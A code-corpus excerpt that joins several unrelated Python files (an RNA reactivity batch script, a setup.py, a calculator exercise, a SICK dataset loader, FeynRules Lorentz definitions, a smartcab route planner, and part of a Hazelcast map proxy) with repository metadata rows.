cmd2 = "make_reactivity_profiles.py --fa %s --rna %s --counts %s --out %s --mindepth %s --maxbg %s 2>/dev/null 1>/dev/null"
cmd3 = "normalize_profiles.py --disable-end3 --tonorm %s 1>/dev/null"
#inputFolders = os.listdir(inDir)
for folder_name in self.folderList:
print("Run "+folder_name)
rna_name = folder_name
tLen = len(sequence[rna_name])
oFolder = outDir + folder_name
if not os.path.isdir(inDir+folder_name):
continue
if not os.path.exists(oFolder):
os.mkdir(oFolder)
inputFiles = os.listdir(inDir+folder_name)
if self.file_filter:
inputFiles = set(inputFiles) & self.file_filter
if 1 in self.steps_to_run:
for iFile in inputFiles:
inFile_full = inDir+folder_name+"/"+iFile
outFile_full = oFolder + "/" + iFile
command = cmd1 % (inFile_full, outFile_full, tLen)
output = subprocess.getoutput(command)
if 2 in self.steps_to_run or 3 in self.steps_to_run:
con_pairs = format_pairs(inputFiles)
for pair in con_pairs:
dmso_full = oFolder + "/" + pair[0]
nai_full = oFolder + "/" + pair[1]
#if len(pair) == 3:
# dc_full = oFolder + "/" + pair[2]
#else:
# dc_full = ""
dc_full = ""
outSHAPEfull = oFolder + "/" + pair[1] + ".shape"
if 2 in self.steps_to_run:
command = cmd2 % (seqFn, rna_name, nai_full+" "+dmso_full+" "+dc_full, outSHAPEfull, self.mindepth, self.maxbg)
output = subprocess.getoutput(command)
if 3 in self.steps_to_run:
command = cmd3 % (outSHAPEfull, )
output = subprocess.getoutput(command)
if "NormError" in output:
print("==>filter "+outSHAPEfull)
os.remove(outSHAPEfull)
else:
print("==>Success "+outSHAPEfull)
def batch_collect_mutations(inDir, outDir, seqFn, nproc=1, file_filter=None, mindepth=5000, maxbg=0.05, steps_to_run=[1,2,3]):
import subprocess, math
import _thread
import time
import random
inputFolders = os.listdir(inDir)
random.shuffle(inputFolders)
if 'rRNA_human_5S' in inputFolders:
inputFolders.remove('rRNA_human_5S')
inputFolders.insert(0, 'rRNA_human_5S')
if 'error' in inputFolders:
inputFolders.remove('error')
N_forEachProc = math.ceil(len(inputFolders) / nproc)
print("Number for each process: "+str(N_forEachProc))
Folders_Lists = []
i = 0
while i < len(inputFolders):
Folders_Lists.append( inputFolders[i:i+N_forEachProc] )
i += N_forEachProc
thred_list = []
for folder_list in Folders_Lists:
thread = MakeReacProfClass(inDir, outDir, seqFn, folder_list, file_filter, mindepth, maxbg, steps_to_run)
thred_list.append( thread )
print("Number of threads list: "+str(len(thred_list)))
for thread in thred_list:
thread.start()
for thread in thred_list:
thread.join()
inDir = "/Share/home/zhangqf7/lipan/precursor_SHAPEMAP/test/dms-mapseq-rep/5.split_mutation"
outDir = "/Share/home/zhangqf7/lipan/precursor_SHAPEMAP/test/dms-mapseq-rep/6.shapemapper"
seqFn = "/Share/home/zhangqf7/lipan/precursor_SHAPEMAP/test/dms-mapseq-rep/ref/yeast.uniq.fa"
file_filter = ['REP1', 'REP2']
batch_collect_mutations(inDir, outDir, seqFn, nproc=20, file_filter=file_filter, mindepth=1000, maxbg=0.05, steps_to_run=[1])
| 44.194286 | 142 | 0.569822 |
f5b1e7289f9bfbeac72dd18eb335bde902363ab9 | 1,756 | py | Python | setup.py | MrRutledge/pypastry | 59104ee8e882e75d33fe7bab60f03c353516eb8a | [
"MIT"
] | 1 | 2019-11-13T11:12:18.000Z | 2019-11-13T11:12:18.000Z | setup.py | MrRutledge/pypastry | 59104ee8e882e75d33fe7bab60f03c353516eb8a | [
"MIT"
] | null | null | null | setup.py | MrRutledge/pypastry | 59104ee8e882e75d33fe7bab60f03c353516eb8a | [
"MIT"
] | null | null | null | import sys
from setuptools import setup, find_packages
#check to make sure the python version is compatible
if sys.version_info < (3, 6):
sys.exit('Sorry, PyPastry requires Python version 3.6 or greater')
# Reading in the ReadMe file as the doc file
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='pypastry',
version='0.2.1',
description='PyPastry machine learning experimentation framework',
author='Daoud Clarke',
url='https://github.com/datapastry/pypastry',
scripts=['pastry'],
install_requires=['tomlkit', 'pandas', 'scikit-learn', 'pyarrow', 'gitpython', 'pytest'],
#To find the packages
packages=find_packages(),
#To read in data file modules
py_modules=['data/pie'],
# commands that can be run in a console in the commands folder
entry_points={
'console_scripts': [
'init = pypastry.commands.init:run',
'print = pypastry.commands.print_:run',
'run = pypastry.commands.run:run'
]},
package_data={
'' : ['data/*.gitignore'],
# And include any *.gitignore files found in the 'data' package, too:
'data': ['*.gitignore'],
},
long_description=long_description,
long_description_content_type='text/markdown',
# Make the setup file aware of the Manifest file
include_package_data=True,
#Minimum requirement of python, licesnse, and operating system.
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"],
python_requires='>=3.5',
)
| 33.769231 | 93 | 0.6418 |
6e766104bdac6ddc8195ddbc96f49804fd7c3a2e | 751 | py | Python | Mundo 2/ex059.py | sandenbergmelo/ExerciciosPython | 049958801823b1b9b23b0e80f6f1bcf8cd272efe | [
"MIT"
] | 1 | 2021-05-12T18:44:11.000Z | 2021-05-12T18:44:11.000Z | Mundo 2/ex059.py | sandenbergmelo/ExerciciosPython | 049958801823b1b9b23b0e80f6f1bcf8cd272efe | [
"MIT"
] | null | null | null | Mundo 2/ex059.py | sandenbergmelo/ExerciciosPython | 049958801823b1b9b23b0e80f6f1bcf8cd272efe | [
"MIT"
] | null | null | null | n1 = int(input('Primeiro valor: '))
n2 = int(input('Segundo valor: '))
opcao = 0
while opcao != 5:
print(''' [ 1 ] Somar
[ 2 ] Multiplicar
[ 3 ] Maior
[ 4 ] Novos números
[ 5 ] Sair do programa''')
opcao = int(input('Opção: '))
if opcao == 1:
soma = n1 + n2
print(f'\n\n{n1} + {n2} = {soma}\n\n')
elif opcao == 2:
produto = n1 * n2
print(f'\n\n{n1} x {n2} = {produto}\n\n')
elif opcao == 3:
maior = max(n1, n2)
menor = min(n1, n2)
print(f'\n\n{maior} é maior que {menor}\n\n')
elif opcao == 4:
print('Novos números: ')
n1 = int(input('Primeiro valor: '))
n2 = int(input('Segundo valor: '))
elif opcao == 5:
print('Fim do programa')
else:
print('Opção inválida')
print('=-=' * 10)
else:
print('Fim do programa')
| 22.088235 | 47 | 0.569907 |
cdbbee64d37a04d2ec606caad18f1e913aaa5736 | 4,628 | py | Python | vdpwi/data.py | achyudh/castor | d7a02ce03f2b71ef1fa490122dd4bbc8214b8b19 | [
"Apache-2.0"
] | 132 | 2017-04-02T12:31:55.000Z | 2019-03-09T07:53:29.000Z | vdpwi/data.py | sudipta90/castor | fa2f59535c71a0fb4586afbe543b81ba812c8630 | [
"Apache-2.0"
] | 111 | 2017-04-01T23:00:24.000Z | 2019-03-10T08:29:20.000Z | vdpwi/data.py | sudipta90/castor | fa2f59535c71a0fb4586afbe543b81ba812c8630 | [
"Apache-2.0"
] | 53 | 2017-04-06T01:17:18.000Z | 2019-02-27T03:10:35.000Z | import argparse
import os
import torch
import torch.nn as nn
import torch.utils.data as data
class Configs(object):
@staticmethod
def base_config():
parser = argparse.ArgumentParser()
parser.add_argument("--classifier", type=str, default="vdpwi", choices=["vdpwi", "resnet"])
parser.add_argument("--clip_norm", type=float, default=50)
parser.add_argument("--cpu", action="store_true", default=False)
parser.add_argument("--dataset", type=str, default="sick", choices=["sick"])
parser.add_argument("--decay", type=float, default=0.95)
parser.add_argument("--input_file", type=str, default="local_saves/model.pt")
parser.add_argument("--lr", type=float, default=5E-4)
parser.add_argument("--mbatch_size", type=int, default=16)
parser.add_argument("--mode", type=str, default="train", choices=["train", "test"])
parser.add_argument("--momentum", type=float, default=0.1)
parser.add_argument("--n_epochs", type=int, default=35)
parser.add_argument("--n_labels", type=int, default=5)
parser.add_argument("--optimizer", type=str, default="rmsprop", choices=["adam", "sgd", "rmsprop"])
parser.add_argument("--output_file", type=str, default="local_saves/model.pt")
parser.add_argument("--res_fmaps", type=int, default=32)
parser.add_argument("--res_layers", type=int, default=16)
parser.add_argument("--restore", action="store_true", default=False)
parser.add_argument("--rnn_hidden_dim", type=int, default=250)
parser.add_argument("--weight_decay", type=float, default=1E-5)
parser.add_argument("--wordvecs_file", type=str, default="local_data/glove/glove.840B.300d.txt")
return parser.parse_known_args()[0]
@staticmethod
def sick_config():
parser = argparse.ArgumentParser()
parser.add_argument("--n_labels", type=int, default=5)
parser.add_argument("--sick_cache", type=str, default="local_data/sick/.vec-cache")
parser.add_argument("--sick_data", type=str, default="local_data/sick")
return parser.parse_known_args()[0]
class LabeledEmbeddedDataset(data.Dataset):
def __init__(self, sentence_indices1, sentence_indices2, labels, compare_labels=None):
assert len(sentence_indices1) == len(labels) == len(sentence_indices2)
self.sentence_indices1 = sentence_indices1
self.sentence_indices2 = sentence_indices2
self.labels = labels
self.compare_labels = compare_labels
def __getitem__(self, idx):
cmp_lbl = None if self.compare_labels is None else self.compare_labels[idx]
return self.sentence_indices1[idx], self.sentence_indices2[idx], self.labels[idx], cmp_lbl
def __len__(self):
return len(self.labels)
def load_sick():
config = Configs.sick_config()
def fetch_indices(name):
sentence_indices = []
filename = os.path.join(config.sick_data, dataset, name)
with open(filename) as f:
for line in f:
indices = [embed_ids.get(word, -1) for word in line.strip().split()]
indices = list(filter(lambda x: x >= 0, indices))
sentence_indices.append(indices)
return sentence_indices
def read_labels(filename):
labels = []
with open(filename) as f:
for line in f:
labels.append([float(val) for val in line.split()])
return labels
sets = []
embeddings = []
embed_ids = {}
with open(os.path.join(config.sick_cache)) as f:
for i, line in enumerate(f):
word, vec = line.split(" ", 1)
vec = list(map(float, vec.strip().split()))
embed_ids[word] = i
embeddings.append(vec)
padding_idx = len(embeddings)
embeddings.append([0.0] * 300)
for dataset in ("train", "dev", "test"):
sparse_filename = os.path.join(config.sick_data, dataset, "sim_sparse.txt")
truth_filename = os.path.join(config.sick_data, dataset, "sim.txt")
sparse_labels = read_labels(sparse_filename)
cmp_labels = read_labels(truth_filename)
indices1 = fetch_indices("a.toks")
indices2 = fetch_indices("b.toks")
sets.append(LabeledEmbeddedDataset(indices1, indices2, sparse_labels, cmp_labels))
embedding = nn.Embedding(len(embeddings), 300)
embedding.weight.data.copy_(torch.Tensor(embeddings))
embedding.weight.requires_grad = False
return embedding, sets
def load_dataset(dataset):
return _loaders[dataset]()
_loaders = dict(sick=load_sick)
| 42.072727 | 107 | 0.658168 |
0c800b9a9b1539f81cc9f466ab49348cd7f2d73b | 2,989 | py | Python | mathematica/feynrules/KineticMixingDM_UFO/lorentz.py | LoganAMorrison/AsymptoticBoltzmann | ef0213a7acc3f8d7095b446716bc90bbb036493d | [
"MIT"
] | null | null | null | mathematica/feynrules/KineticMixingDM_UFO/lorentz.py | LoganAMorrison/AsymptoticBoltzmann | ef0213a7acc3f8d7095b446716bc90bbb036493d | [
"MIT"
] | null | null | null | mathematica/feynrules/KineticMixingDM_UFO/lorentz.py | LoganAMorrison/AsymptoticBoltzmann | ef0213a7acc3f8d7095b446716bc90bbb036493d | [
"MIT"
] | null | null | null | # This file was automatically created by FeynRules 2.3.36
# Mathematica version: 12.1.1 for Linux x86 (64-bit) (June 19, 2020)
# Date: Thu 13 Aug 2020 15:13:29
from object_library import all_lorentz, Lorentz
from function_library import complexconjugate, re, im, csc, sec, acsc, asec, cot
try:
import form_factors as ForFac
except ImportError:
pass
UUS1 = Lorentz(name = 'UUS1',
spins = [ -1, -1, 1 ],
structure = '1')
UUV1 = Lorentz(name = 'UUV1',
spins = [ -1, -1, 3 ],
structure = 'P(3,2) + P(3,3)')
SSS1 = Lorentz(name = 'SSS1',
spins = [ 1, 1, 1 ],
structure = '1')
FFS1 = Lorentz(name = 'FFS1',
spins = [ 2, 2, 1 ],
structure = 'ProjM(2,1)')
FFS2 = Lorentz(name = 'FFS2',
spins = [ 2, 2, 1 ],
structure = 'ProjM(2,1) - ProjP(2,1)')
FFS3 = Lorentz(name = 'FFS3',
spins = [ 2, 2, 1 ],
structure = 'ProjP(2,1)')
FFS4 = Lorentz(name = 'FFS4',
spins = [ 2, 2, 1 ],
structure = 'ProjM(2,1) + ProjP(2,1)')
FFV1 = Lorentz(name = 'FFV1',
spins = [ 2, 2, 3 ],
structure = 'Gamma(3,2,1)')
FFV2 = Lorentz(name = 'FFV2',
spins = [ 2, 2, 3 ],
structure = 'Gamma(3,2,-1)*ProjM(-1,1)')
FFV3 = Lorentz(name = 'FFV3',
spins = [ 2, 2, 3 ],
structure = 'Gamma(3,2,-1)*ProjP(-1,1)')
VSS1 = Lorentz(name = 'VSS1',
spins = [ 3, 1, 1 ],
structure = 'P(1,2) - P(1,3)')
VVS1 = Lorentz(name = 'VVS1',
spins = [ 3, 3, 1 ],
structure = 'Metric(1,2)')
VVV1 = Lorentz(name = 'VVV1',
spins = [ 3, 3, 3 ],
structure = 'P(3,1)*Metric(1,2) - P(3,2)*Metric(1,2) - P(2,1)*Metric(1,3) + P(2,3)*Metric(1,3) + P(1,2)*Metric(2,3) - P(1,3)*Metric(2,3)')
SSSS1 = Lorentz(name = 'SSSS1',
spins = [ 1, 1, 1, 1 ],
structure = '1')
VVSS1 = Lorentz(name = 'VVSS1',
spins = [ 3, 3, 1, 1 ],
structure = 'Metric(1,2)')
VVVV1 = Lorentz(name = 'VVVV1',
spins = [ 3, 3, 3, 3 ],
structure = 'Metric(1,4)*Metric(2,3) - Metric(1,3)*Metric(2,4)')
VVVV2 = Lorentz(name = 'VVVV2',
spins = [ 3, 3, 3, 3 ],
structure = 'Metric(1,4)*Metric(2,3) + Metric(1,3)*Metric(2,4) - 2*Metric(1,2)*Metric(3,4)')
VVVV3 = Lorentz(name = 'VVVV3',
spins = [ 3, 3, 3, 3 ],
structure = 'Metric(1,4)*Metric(2,3) - Metric(1,2)*Metric(3,4)')
VVVV4 = Lorentz(name = 'VVVV4',
spins = [ 3, 3, 3, 3 ],
structure = 'Metric(1,3)*Metric(2,4) - Metric(1,2)*Metric(3,4)')
VVVV5 = Lorentz(name = 'VVVV5',
spins = [ 3, 3, 3, 3 ],
structure = 'Metric(1,4)*Metric(2,3) - (Metric(1,3)*Metric(2,4))/2. - (Metric(1,2)*Metric(3,4))/2.')
| 31.463158 | 153 | 0.463031 |
ef2d9ce79e6bc0c87b840a6ce8204bae1ce5e0ef | 430 | py | Python | output/models/nist_data/atomic/ncname/schema_instance/nistschema_sv_iv_atomic_ncname_length_1_xsd/nistschema_sv_iv_atomic_ncname_length_1.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 1 | 2021-08-14T17:59:21.000Z | 2021-08-14T17:59:21.000Z | output/models/nist_data/atomic/ncname/schema_instance/nistschema_sv_iv_atomic_ncname_length_1_xsd/nistschema_sv_iv_atomic_ncname_length_1.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 4 | 2020-02-12T21:30:44.000Z | 2020-04-15T20:06:46.000Z | output/models/nist_data/atomic/ncname/schema_instance/nistschema_sv_iv_atomic_ncname_length_1_xsd/nistschema_sv_iv_atomic_ncname_length_1.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
__NAMESPACE__ = "NISTSchema-SV-IV-atomic-NCName-length-1-NS"
@dataclass
class NistschemaSvIvAtomicNcnameLength1:
class Meta:
name = "NISTSchema-SV-IV-atomic-NCName-length-1"
namespace = "NISTSchema-SV-IV-atomic-NCName-length-1-NS"
value: str = field(
default="",
metadata={
"required": True,
"length": 1,
}
)
| 22.631579 | 64 | 0.62093 |
5a52130a3fd85039c173d92ef0c13a0868635d7f | 1,593 | py | Python | smartcab/planner.py | thantuongaotrang/smart-cab | f5e34b15d01f6f15385318e5d09360cb1218b806 | [
"MIT"
] | null | null | null | smartcab/planner.py | thantuongaotrang/smart-cab | f5e34b15d01f6f15385318e5d09360cb1218b806 | [
"MIT"
] | null | null | null | smartcab/planner.py | thantuongaotrang/smart-cab | f5e34b15d01f6f15385318e5d09360cb1218b806 | [
"MIT"
] | null | null | null | import random
class RoutePlanner(object):
"""Silly route planner that is meant for a perpendicular grid network."""
def __init__(self, env, agent):
self.env = env
self.agent = agent
self.destination = None
def route_to(self, destination=None):
self.destination = destination if destination is not None else random.choice(self.env.intersections.keys())
print "RoutePlanner.route_to(): destination = {}".format(destination) # [debug]
def next_waypoint(self):
location = self.env.agent_states[self.agent]['location']
heading = self.env.agent_states[self.agent]['heading']
delta = (self.destination[0] - location[0], self.destination[1] - location[1])
if delta[0] == 0 and delta[1] == 0:
return None
elif delta[0] != 0: # EW difference
if delta[0] * heading[0] > 0: # facing correct EW direction
return 'forward'
elif delta[0] * heading[0] < 0: # facing opposite EW direction
return 'right' # long U-turn
elif delta[0] * heading[1] > 0:
return 'right'
else:
return 'left'
elif delta[1] != 0: # NS difference
if delta[1] * heading[1] > 0: # facing correct NS direction
return 'forward'
elif delta[1] * heading[1] < 0: # facing opposite NS direction
return 'right' # long U-turn
elif delta[1] * heading[0] > 0:
return 'right'
else:
return 'left'
| 40.846154 | 115 | 0.560578 |
3b9e5ed5d79c9462856e4e8a132ac963622f9889 | 33,643 | py | Python | hzclient/proxy/mapproxy.py | hazelcast-incubator/hazelcast-python-client | 5ec6c908916a6adef648059314923c0dbf71557b | [
"Apache-2.0"
] | null | null | null | hzclient/proxy/mapproxy.py | hazelcast-incubator/hazelcast-python-client | 5ec6c908916a6adef648059314923c0dbf71557b | [
"Apache-2.0"
] | null | null | null | hzclient/proxy/mapproxy.py | hazelcast-incubator/hazelcast-python-client | 5ec6c908916a6adef648059314923c0dbf71557b | [
"Apache-2.0"
] | null | null | null | __author__ = 'jonathanbrodie'
from hzclient.codec import mapcodec
from hzclient.codec import proxycodec
from hzclient.clientmessage import ClientMessage
from util import encode
class MapProxy(object):
def __init__(self,title,connfamily):
self.title=title
self.connection=connfamily
firstpack=proxycodec.createProxy(self.title, "hz:impl:mapService")
self.connection.sendPackage(firstpack)
response=self.connection.getPackageWithCorrelationId(firstpack.correlation,True)
newresponse=ClientMessage.decodeMessage(response)
if response is not None:
print "Initialized and connected proxy!"
else:
print "Unable to connect to server."
def AddEntryListener(self, includeValue, eventhandler):
msg=mapcodec.MapAddEntryListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodeboolean(includeValue))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg)
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerCodec.EventHandler(eventhandler)
return mapcodec.MapAddEntryListenerCodec.decodeResponse(msg2).response
def AddEntryListenerToKey(self, key, includeValue, eventhandler):
msg=mapcodec.MapAddEntryListenerToKeyCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeboolean(includeValue))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerToKeyCodec.EventHandler(eventhandler)
return mapcodec.MapAddEntryListenerToKeyCodec.decodeResponse(msg2).response
def AddEntryListenerToKeyWithPredicate(self, key, predicate, includeValue, eventhandler):
msg=mapcodec.MapAddEntryListenerToKeyWithPredicateCodec.encodeRequest( encode.encodestring(self.title), key, predicate, encode.encodeboolean(includeValue))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerToKeyWithPredicateCodec.EventHandler(eventhandler)
return mapcodec.MapAddEntryListenerToKeyWithPredicateCodec.decodeResponse(msg2).response
def AddEntryListenerWithPredicate(self, predicate, includeValue, eventhandler):
msg=mapcodec.MapAddEntryListenerWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate, encode.encodeboolean(includeValue))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerWithPredicateCodec.EventHandler(eventhandler)
return mapcodec.MapAddEntryListenerWithPredicateCodec.decodeResponse(msg2).response
def AddIndex(self, attribute, ordered):
msg=mapcodec.MapAddIndexCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(attribute), encode.encodeboolean(ordered))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapAddIndexCodec.decodeResponse(msg2)
def AddInterceptor(self, interceptor):
msg=mapcodec.MapAddInterceptorCodec.encodeRequest( encode.encodestring(self.title), interceptor)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapAddInterceptorCodec.decodeResponse(msg2).response
def AddNearCacheEntryListener(self, includeValue, eventhandler):
msg=mapcodec.MapAddNearCacheEntryListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodeboolean(includeValue))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddNearCacheEntryListenerCodec.EventHandler(eventhandler)
return mapcodec.MapAddNearCacheEntryListenerCodec.decodeResponse(msg2).response
def AddPartitionLostListener(self, eventhandler):
msg=mapcodec.MapAddPartitionLostListenerCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddPartitionLostListenerCodec.EventHandler(eventhandler)
return mapcodec.MapAddPartitionLostListenerCodec.decodeResponse(msg2).response
def Clear(self, ):
msg=mapcodec.MapClearCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapClearCodec.decodeResponse(msg2)
def ContainsKey(self, key, threadId):
msg=mapcodec.MapContainsKeyCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapContainsKeyCodec.decodeResponse(msg2).response
def ContainsValue(self, value):
msg=mapcodec.MapContainsValueCodec.encodeRequest( encode.encodestring(self.title), value)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapContainsValueCodec.decodeResponse(msg2).response
def Delete(self, key, threadId):
msg=mapcodec.MapDeleteCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapDeleteCodec.decodeResponse(msg2)
def EntriesWithPagingPredicate(self, predicate):
msg=mapcodec.MapEntriesWithPagingPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapEntriesWithPagingPredicateCodec.decodeResponse(msg2).entrySet
def EntriesWithPredicate(self, predicate):
msg=mapcodec.MapEntriesWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapEntriesWithPredicateCodec.decodeResponse(msg2).entrySet
def EntrySet(self, ):
msg=mapcodec.MapEntrySetCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapEntrySetCodec.decodeResponse(msg2).entrySet
def EvictAll(self, ):
msg=mapcodec.MapEvictAllCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapEvictAllCodec.decodeResponse(msg2)
def Evict(self, key, threadId):
msg=mapcodec.MapEvictCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapEvictCodec.decodeResponse(msg2).response
def ExecuteOnAllKeys(self, entryProcessor):
msg=mapcodec.MapExecuteOnAllKeysCodec.encodeRequest( encode.encodestring(self.title), entryProcessor)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapExecuteOnAllKeysCodec.decodeResponse(msg2).entrySet
def ExecuteOnKey(self, entryProcessor, key):
msg=mapcodec.MapExecuteOnKeyCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, key)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapExecuteOnKeyCodec.decodeResponse(msg2).response
def ExecuteOnKeys(self, entryProcessor, keys):
msg=mapcodec.MapExecuteOnKeysCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, keys)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapExecuteOnKeysCodec.decodeResponse(msg2).entrySet
def ExecuteWithPredicate(self, entryProcessor, predicate):
msg=mapcodec.MapExecuteWithPredicateCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapExecuteWithPredicateCodec.decodeResponse(msg2).entrySet
def Flush(self, ):
msg=mapcodec.MapFlushCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapFlushCodec.decodeResponse(msg2)
def ForceUnlock(self, key):
msg=mapcodec.MapForceUnlockCodec.encodeRequest( encode.encodestring(self.title), key)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapForceUnlockCodec.decodeResponse(msg2)
def GetAll(self, keys):
msg=mapcodec.MapGetAllCodec.encodeRequest( encode.encodestring(self.title), keys)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapGetAllCodec.decodeResponse(msg2).entrySet
def GetAsync(self, key, threadId):
msg=mapcodec.MapGetAsyncCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
